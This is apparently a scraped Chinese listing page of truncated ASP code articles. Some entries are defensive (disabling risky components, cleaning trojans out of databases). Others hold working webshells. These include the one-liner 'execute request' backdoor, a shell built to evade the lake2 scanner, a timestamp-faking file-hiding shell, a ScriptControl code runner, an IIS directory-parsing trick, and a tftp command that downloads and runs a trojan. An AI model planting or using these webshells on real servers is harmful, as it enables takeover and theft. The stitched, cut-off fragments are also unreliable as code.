Time of Update: 2017-01-18
一般現今ASP木馬常通過以下四點來動作伺服器,所以我們只要將一下四處設定好就能從一 前使用IIS伺服器的站長很多,特別是對於ASP網站來說,防止ASP木馬成了網站安全最關鍵的內容。 一般現今ASP木馬常通過以下四點來動作伺服器,所以我們只要將一下四處設定好就能從一定程度上有效防止ASP木馬的入侵 一、使用FileSystemObject組件 FileSystemObject可以對檔案進行常規操作 可以通過修改註冊表,將此組件改名,來防止此類木馬的危害。
Time of Update: 2017-01-18
複製代碼 代碼如下: <%if request.QueryString("action")="log" then a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):
Time of Update: 2017-01-18
複製代碼 代碼如下:<% '隱藏並修改檔案的最後修改時間的aspshell '原理:通過FSO可以修改檔案的屬性,比如設定為唯讀,隱藏,系統等等;FSO中的attributes屬性修改檔案屬性,1隻讀,2隱藏,4系統檔案 ' 通過shell.application可以給檔案重新設定一個最後修改時間 '2009/02/24 write by skyfire response.write "<form method=post>" response.write
Time of Update: 2017-01-18
hanxiaolian 為了躲避 lake2 ASP站長管理助手而寫.. 一.繞過lake2 Asp木馬掃描的小馬 複製代碼 代碼如下: <% set c = CreateObject("ADOX.Catalog") c.create("Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath("a.asp")) set c = Nothing c&Server.MapPath("a.asp") set
Time of Update: 2017-01-18
首先在asp檔案中寫如<%execute request("value")%>代碼如果想要隱藏,就要加入一些if判斷語句,即可然後在本地寫個表單 複製代碼 代碼如下:<form action=http://***.com/jb51.asp method=post> <textarea name=value cols=120 rows=10 width=45> set lP=server.createObject("Adodb.Stream") lP.Open
Time of Update: 2017-01-18
通過HTTP協議來訪問 一句話木馬的使用範圍(我只列舉了2種): 1)只有Database Backup的情況 Database Backup成asp檔案時候,不出現“ 編譯錯誤,缺少指令碼關閉標誌%>" 2)SA許可權的時候,一般先寫入一句話,圖個方便..(當然,直接tftp上傳鴿子運行,那更快) tftp -i ip get server.exe 一句話木馬<%execute request("a")%>的原理:
Time of Update: 2017-01-18
放在conn.asp裡就行了。 '屏蔽通過地址欄攻擊 url=Request.ServerVariables("QUERY_STRING") if instr(url,";")>=1 then url=Replace(url,";",";") : Response.Redirect("?" & url) end if '屏蔽通過表單攻擊
Time of Update: 2017-01-18
1、建立非標準目錄:mkdir images..\ 拷貝ASP木馬至目錄:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp 通過web訪問ASP木馬:http://ip/images../news.asp?action=login 如何刪除非標準目錄:rmdir images..\ /s 2、Windows中的IIS會對以.asp結尾的目錄中的檔案進行解析,
Time of Update: 2017-01-18
<% 'code by netpatch dim dbfile,sql db="netpatch.asp" dbfile=server.MapPath(db) set ydb=server.CreateObject("ADOX.Catalog")
Time of Update: 2017-01-18
說明: 1、此工具可以批量替換網站上asp,.txt,php,aspx...等等文本型的字元 2、將replace.asp上傳至網站根目錄後,運行http://網站網域名稱/replace.asp 3、為了安全,使用本程式後請刪除或更名複製代碼 代碼如下:<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <%option explicit Response.Buffer=true Response.CharSet="GB2312
Time of Update: 2017-01-18
<% '名稱:asp通用採集函數冗餘版,要精品版的有心人自己改 '作者:柳永法 '日期:2007-6-23 Function getHTTPPage(Path) t = GetBody(Path) getHTTPPage = BytesToBstr(t, "GB2312") End Function
Time of Update: 2017-01-18
<% dim act,ifLogin,loginUrl,loginActUrl,loginData,fileUrl,fileName act=request.QueryString("act") if(act="do") then ifLogin=Cint(request.QueryString("ifLogin")) loginActUrl=request.Form("loginActUrl")
Time of Update: 2017-01-18
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%><!-- #include file="conn.asp" --> <!-- #include file="inc/function.asp" --><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
Time of Update: 2017-01-18
複製代碼 代碼如下:<% '======================================== class EngineerSearch '老龍:laolong9999@sina.com ':類比XML擷取http標記資源(用過之後就知道為什麼XML有用:)) '利用引擎搜尋(顯示引擎資訊或其超串連網站上的資訊或直接一個指定頁面的相關資訊,利用正則和xmlHttp, '程式的使用需要會構造正則)
Time of Update: 2017-01-18
簡單採集類1.0測試版------------------------------Cls_Ajax.asp 負責採集網頁Cls_Filter.asp 負責過濾資料Cls_Thief.asp
Time of Update: 2017-01-18
現在流行虛擬機器主機建站,我也有個網站,也算是個站長咯。當了近一年的站長,感到網站程式每次升級的時候頗為麻煩:先去官方看公告,然後下載升級包到本地,解壓,FTP上傳到虛擬機器主機。這些都是累人的體力活,加之本人又懶得很,所以異想天開的覺得要是程式能夠自動升級就好了。所以就想了想,寫了本文,希望對WEB程式開發人員有協助。這裡只針對ASP,因為我只會ASP :-( 先看看傳統的win32程式的升級過程(比如殺毒軟體),它是依靠軟體的升級程式通過網路連接到伺服器分析並下載升級檔案到本地。
Time of Update: 2017-01-18
本文我們詳細介紹了ASP資料庫被掛木馬的詳細解決方案之編程處理的方法,解決方案分為以下三步:第一步:為現有資料庫做好備份。第二步:執行如下ASP檔案,這樣就可以去掉資料庫當中的JS木馬:註:conn.asp自己去寫了。'這裡放入JS木馬內容:請記得改為自己資料庫中的JS木馬內容。<!--#include file="conn.asp"--> <% Server.ScriptTimeOut=180 Set rstSchema = conn.OpenSchema(20) k=
Time of Update: 2017-01-18
首先判斷檔案大小:if file.filesize<10 then Response.Write("<script>alert('您沒有選擇上傳檔案')</script>") Response.Write("<script>history.go(-1)</script>") Response.End()end if將檔案上傳到伺服器後,判斷使用者檔案中的危險操作字元:set MyFile =
Time of Update: 2017-01-18
修改三個組件來達到防asp木馬攻擊.FileSystemObject組件---對檔案進行常規操作.WScript.Shell組件---可以調用系統核心運行DOS命令.Shell.Application組件--可以調用系統核心運行DOS命令.一.使用FileSystemObject組件1.可以通過修改註冊表,將此組件改名,來防止此類木馬的危害.HKEY_CLASSES_ROOT\Scripting.FileSystemObject\改名為其它的名字,如:改為FileSystemObject_goo
Time of Update: 2017-01-18
今天重新研究了下VB裡面的ScriptControl組件,發現asp裡面也能調用。研究了下方法,後來和lcx討論了下。得到了如下代碼,在此感謝前輩的指點,呵呵。 代碼很簡單,我就不多做解釋了,以免有人罵我裝。 複製代碼 代碼如下:<% Set o = Server.CreateObject("ScriptControl") o.language = "vbscript" o.addcode(Request("SubCode")) '參數SubCode作為過程代碼 o.run